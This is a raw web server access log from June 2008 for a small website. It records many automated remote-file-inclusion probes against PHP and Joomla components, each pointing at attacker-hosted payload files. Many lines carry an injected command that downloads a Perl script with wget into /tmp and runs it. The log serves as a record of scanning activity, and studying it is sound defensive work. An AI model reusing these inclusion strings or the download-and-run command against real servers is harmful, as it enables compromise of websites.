74.55.68.38 - - [15/Jun/2008:17:00:05 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.195.37.175 - - [15/Jun/2008:17:05:30 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
195.225.171.183 - - [15/Jun/2008:17:05:54 -0700] "GET /logs//components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.letsdoit.ch/mic22cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
195.225.171.183 - - [15/Jun/2008:17:05:54 -0700] "GET //components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.letsdoit.ch/mic22cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
74.55.68.38 - - [15/Jun/2008:17:05:58 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
74.55.68.38 - - [15/Jun/2008:17:05:58 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
74.55.68.38 - - [15/Jun/2008:17:06:03 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
74.55.68.38 - - [15/Jun/2008:17:06:03 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
195.225.171.183 - - [15/Jun/2008:17:06:34 -0700] "GET /logs//components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
195.225.171.183 - - [15/Jun/2008:17:06:34 -0700] "GET //components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.atlantisimmo.eu//administrator/components/com_joomla-visites/core/include/graphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
75.125.162.210 - - [15/Jun/2008:17:07:58 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://rosok.com/images/stories/themer.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
202.181.105.117 - - [15/Jun/2008:17:08:59 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [15/Jun/2008:17:08:59 -0700] "GET /modules/My_eGallery/index.php?basepath=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [15/Jun/2008:17:09:00 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
75.125.162.210 - - [15/Jun/2008:17:09:44 -0700] "GET /logs/access_080211.log/admincp/auth/checklogin.php?cfgProgDir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
75.125.162.210 - - [15/Jun/2008:17:09:45 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
75.125.162.210 - - [15/Jun/2008:17:09:45 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
75.125.162.210 - - [15/Jun/2008:17:09:56 -0700] "GET /logs/access_080211.log/admincp/auth/checklogin.php?cfgProgDir=http://rosok.com/images/stories/themer.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
75.125.162.210 - - [15/Jun/2008:17:09:56 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://rosok.com/images/stories/themer.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
75.125.162.210 - - [15/Jun/2008:17:09:56 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://rosok.com/images/stories/themer.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
74.55.68.38 - - [15/Jun/2008:17:09:57 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
74.55.68.38 - - [15/Jun/2008:17:09:57 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.195.37.175 - - [15/Jun/2008:17:10:13 -0700] "GET /tmp/?S=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
82.80.245.245 - - [15/Jun/2008:17:11:30 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
82.80.245.245 - - [15/Jun/2008:17:11:30 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
82.80.245.245 - - [15/Jun/2008:17:11:59 -0700] "GET /logs/access_080211.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
82.80.245.245 - - [15/Jun/2008:17:12:00 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
82.80.245.245 - - [15/Jun/2008:17:12:00 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
82.80.245.245 - - [15/Jun/2008:17:12:16 -0700] "GET /logs/access_080211.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
82.80.245.245 - - [15/Jun/2008:17:12:16 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
82.80.245.245 - - [15/Jun/2008:17:12:17 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
67.195.37.175 - - [15/Jun/2008:17:12:49 -0700] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
202.181.105.117 - - [15/Jun/2008:17:13:36 -0700] "GET /logs/access_080225.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
74.55.68.38 - - [15/Jun/2008:17:13:36 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
74.55.68.38 - - [15/Jun/2008:17:13:36 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
202.181.105.117 - - [15/Jun/2008:17:13:36 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
202.181.105.117 - - [15/Jun/2008:17:13:37 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
67.195.52.25 - - [15/Jun/2008:17:14:25 -0700] "GET /?N=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
202.181.105.117 - - [15/Jun/2008:17:16:17 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [15/Jun/2008:17:16:17 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [15/Jun/2008:17:16:17 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
82.80.245.245 - - [15/Jun/2008:17:20:36 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
82.80.245.245 - - [15/Jun/2008:17:20:37 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
68.90.68.50 - - [15/Jun/2008:17:21:47 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.geocities.com/ago3sd3dy/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
82.80.245.245 - - [15/Jun/2008:17:23:03 -0700] "GET /logs/access_080211.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
67.195.37.175 - - [15/Jun/2008:17:23:04 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
82.80.245.245 - - [15/Jun/2008:17:23:04 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
82.80.245.245 - - [15/Jun/2008:17:23:04 -0700] "GET /logs/access_080211.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
82.80.245.245 - - [15/Jun/2008:17:23:04 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
82.80.245.245 - - [15/Jun/2008:17:23:05 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
82.80.245.245 - - [15/Jun/2008:17:23:05 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
82.80.245.245 - - [15/Jun/2008:17:25:25 -0700] "GET /logs/access_080225.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
82.80.245.245 - - [15/Jun/2008:17:25:32 -0700] "GET /logs/access_080225.log/tools/send_reminders.php?noSet=0&includedir=http://hetstence.com/blog/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
209.237.231.200 - - [15/Jun/2008:17:28:45 -0700] "GET /logs/errors.php?error=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.neighborhoodglimpses.com"
209.237.231.200 - - [15/Jun/2008:17:28:52 -0700] "GET /errors.php?error=http://www.fightersoft.ro/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.neighborhoodglimpses.com"
202.181.105.117 - - [15/Jun/2008:17:31:51 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [15/Jun/2008:17:31:51 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [15/Jun/2008:17:31:52 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
80.40.126.43 - - [15/Jun/2008:17:34:00 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://piauibrlink.web44.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.neighborhoodglimpses.com"
80.40.126.43 - - [15/Jun/2008:17:34:00 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://piauibrlink.web44.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.neighborhoodglimpses.com"
80.154.38.121 - - [15/Jun/2008:17:35:40 -0700] "GET /convert/mvcw.php?vwar_root=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
80.154.38.121 - - [15/Jun/2008:17:36:14 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
80.154.38.121 - - [15/Jun/2008:17:37:00 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
202.181.105.117 - - [15/Jun/2008:17:39:34 -0700] "GET /logs/access_080414.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [15/Jun/2008:17:39:35 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [15/Jun/2008:17:39:35 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
202.181.105.117 - - [15/Jun/2008:17:52:06 -0700] "GET /logs/access_080414.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
67.15.200.173 - - [15/Jun/2008:17:52:53 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
67.15.200.173 - - [15/Jun/2008:17:52:55 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
67.15.200.173 - - [15/Jun/2008:17:52:55 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.neighborhoodglimpses.com"
67.15.200.173 - - [15/Jun/2008:18:01:36 -0700] "GET /logs/access_080211.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
67.15.200.173 - - [15/Jun/2008:18:01:37 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
67.15.200.173 - - [15/Jun/2008:18:01:37 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mondocitta.net/.htaccess_/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "neighborhoodglimpses.com"
151.11.24.250 - - [15/Jun/2008:18:02:43 -0700] "GET /index.php?page=%20http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "neighborhoodglimpses.com"
151.11.24.250 - - [15/Jun/2008:18:02:44 -0700] "GET /logs/index.php?page=%20http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "neighborhoodglimpses.com"
87.106.6.169 - - [15/Jun/2008:18:07:09 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.230.27.160 - - [15/Jun/2008:18:07:17 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
213.219.170.56 - - [15/Jun/2008:18:07:19 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
195.28.69.222 - - [15/Jun/2008:18:07:45 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
87.106.61.18 - - [15/Jun/2008:18:07:46 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
213.239.213.41 - - [15/Jun/2008:18:07:46 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.neighborhoodglimpses.com"
85.236.53.164 - - [15/Jun/2008:18:07:55 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
66.246.129.122 - - [15/Jun/2008:18:08:29 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:08:33 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:08:33 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
213.208.134.30 - - [15/Jun/2008:18:08:44 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
88.198.185.6 - - [15/Jun/2008:18:09:12 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
195.146.242.105 - - [15/Jun/2008:18:09:13 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
77.79.246.200 - - [15/Jun/2008:18:09:38 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
77.79.246.200 - - [15/Jun/2008:18:09:38 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
81.16.50.217 - - [15/Jun/2008:18:10:09 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
89.111.170.125 - - [15/Jun/2008:18:11:11 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
213.68.134.3 - - [15/Jun/2008:18:12:52 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
12.29.165.84 - - [15/Jun/2008:18:13:11 -0700] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:14:11 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:14:12 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
70.85.192.194 - - [15/Jun/2008:18:14:12 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
213.219.170.56 - - [15/Jun/2008:18:16:44 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://beusix.net/cmd.gif?&cmd=wget%20www.grupaw.pl/d.pl%20-O%20/tmp/d.pl;perl%20/tmp/d.pl;id; HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
